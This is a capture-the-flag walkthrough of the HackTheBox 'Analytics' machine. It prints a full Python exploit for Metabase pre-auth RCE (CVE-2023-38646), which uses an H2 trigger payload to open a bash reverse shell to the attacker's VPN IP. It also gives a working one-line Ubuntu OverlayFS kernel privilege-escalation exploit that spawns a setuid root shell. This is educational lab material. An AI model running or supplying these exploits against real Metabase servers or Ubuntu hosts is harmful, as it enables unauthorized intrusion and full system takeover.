Analytics

Analytics writeup by Thamizhiniyan C S

Overview

Greetings everyone,

In this write-up, we will tackle Analytics from HackTheBox.

Machine link: Analytics Machine

Difficulty Level: Easy

Let's Begin 🙌

Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. Click Here to learn more about how to connect to VPN and access the boxes.

Once connected to the VPN service, click on "Join Machine" to access the machine's IP.

Upon joining the machine, you will be able to view the IP address of the target machine.


Reconnaissance

Rust Scan

rustscan --range=1-65535 --ulimit 5000 -a <TARGET_IP> -- -A -T4 -v -Pn

Results

PortsServicesService Version

22

SSH

OpenSSH 8.9p1

80

HTTP

nginx 1.18.0


Information Gathering - analytical.htb

First, let's take a look at the website running on port 80.

When attempting to access view port 80, it redirects to the domain analytical.htb. Therefore, to access the website, we need to append an entry to the /etc/hosts file, mapping the domain to the target IP address.

Command: sudo vim /etc/hosts

Now we have access to the website. I used Wappalyzer to check the technologies employed, but nothing of particular interest was discovered.

When I clicked the login button in the top right corner of the webpage, it redirected me to the subdomain data.analytical.htb. To access it, you need to append another entry to the /etc/hosts file.

Now, we can access the website. The website hosted on data.analytical.htb is a Metabase login page. Metabase is an open-source business intelligence tool that allows you to connect to many popular databases.

CVE-2023-38646

I began searching for recent exploits and vulnerabilities related to Metabase and came across this: https://www.assetnote.io/resources/research/chaining-our-way-to-pre-auth-rce-in-metabase-cve-2023-38646.

As mentioned in the article, I verified whether /api/session/properties is accessible, and indeed, it was.

Next, I searched for the setup-token in the /api/session/properties page. I copied the content of the page and pasted it into a JSON beautifier, where I located the setup-token. I utilized the following JSON beautifier website: https://codebeautify.org/jsonviewer.

Initial Access

This indicates that the Metabase application is vulnerable to Remote Code Execution (RCE). I crafted a Python script based on the Proof of Concept (PoC) mentioned in the above article, along with references from other PoCs targeting the same vulnerability. The script retrieves the setup-token from the Metabase application and sends a POST request to /api/setup/validate to exploit the RCE, consequently enabling a reverse shell to be established back to the attacker's machine.

import base64
from string import ascii_uppercase
import requests
import random

localhost = '10.10.16.10'  # HTB VPN TUNNEL IP

listening_port = '9001'  # Netcat listener port

response1 = requests.get("http://data.analytical.htb/api/session/properties")

setup_token = response1.json()['setup-token']

reverse_shell = f'bash -i >&/dev/tcp/{localhost}/{listening_port} 0>&1'

def encode_command_to_b64(payload: str) -> str:
    encoded_payload = base64.b64encode(payload.encode('ascii')).decode()
    equals_count = encoded_payload.count('=')

    if equals_count >= 1:
        encoded_payload = base64.b64encode(f'{payload + " " * equals_count}'.encode('ascii')).decode()

    return encoded_payload

command = encode_command_to_b64(reverse_shell)

url = f'http://data.analytical.htb/api/setup/validate'

headers = {
    "Content-Type": "application/json",
    "Connection": "close"
}

payload = {
    "token": setup_token,
    "details": {
        "details": {
            "db": "zip:/app/metabase.jar!/sample-database.db;TRACE_LEVEL_SYSTEM_OUT=0\\;CREATE TRIGGER {random_string} BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {{echo,{command}}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x".format(
                random_string=''.join(random.choice(ascii_uppercase) for i in range(12)), command=command),
            "advanced-options": False,
            "ssl": True
        },
        "name": "x",
        "engine": "h2"
    }
}

request = requests.post(url, json=payload, headers=headers)

Before executing the script, initiate a netcat listener on port 9001.

Now, execute the Python script and monitor the netcat listener. You will observe that you receive a connection back from the target machine. Upon further exploration of the machine, I discovered linpeas in the home directory. However, running it did not yield any privilege escalation vectors. Therefore, I continued searching for alternative avenues. I inspected the environment variables of the target machine, from which I obtained a username and password.

Since SSH is running on the target machine, I attempted to log in using the credentials we obtained, and to my satisfaction, it worked.

Getting the User Flag

Privilege Escalation

I was trying all the privilege escalation vectors but nothing worked. I proceeded to identify the kernel version as my next step in the investigation.

I began searching for exploits targeting the identified kernel version and came across this: https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629.

I examined the exploit.sh file in the mentioned repository. It contained a single line of code that performed the privilege escalation task. Subsequently, I copied and executed the code. Below, I have provided the code:

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'

Getting the Root Flag

I executed the code, and to my satisfaction, it successfully completed the privilege escalation, granting me access to the root flag.

Thank You....

Last updated